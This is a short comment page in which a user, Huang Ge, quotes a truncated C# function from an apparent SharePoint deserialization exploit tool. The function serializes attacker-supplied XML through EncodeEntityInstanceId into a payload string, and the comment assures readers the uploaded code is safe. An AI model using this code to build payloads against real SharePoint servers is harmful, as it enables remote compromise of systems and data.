Huang Ge

Results 2 comments of Huang Ge

It just calls SharePoint's own interface EncodeEntityInstanceId to serialize the XML string into an object instance,

```
private string EncodeEntityStr(String xml)
{
    try
    {
        object[] objs = new object[1];
        objs[0] = XmlDesc(xml);
        var payloadstr = Microsoft.SharePoint.BusinessData.Infrastructure.EntityInstanceIdEncoder.EncodeEntityInstanceId(objs);
        return payloadstr;
    }
    catch (Exception)
    {
        MessageBox.Show("xml error", "Tip",...
```

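Bro, the serialization vulnerability is triggered when the object is generated and parsed; that's the only way to generate the payload. The code has been uploaded. It's clean and safe, don't be afraid.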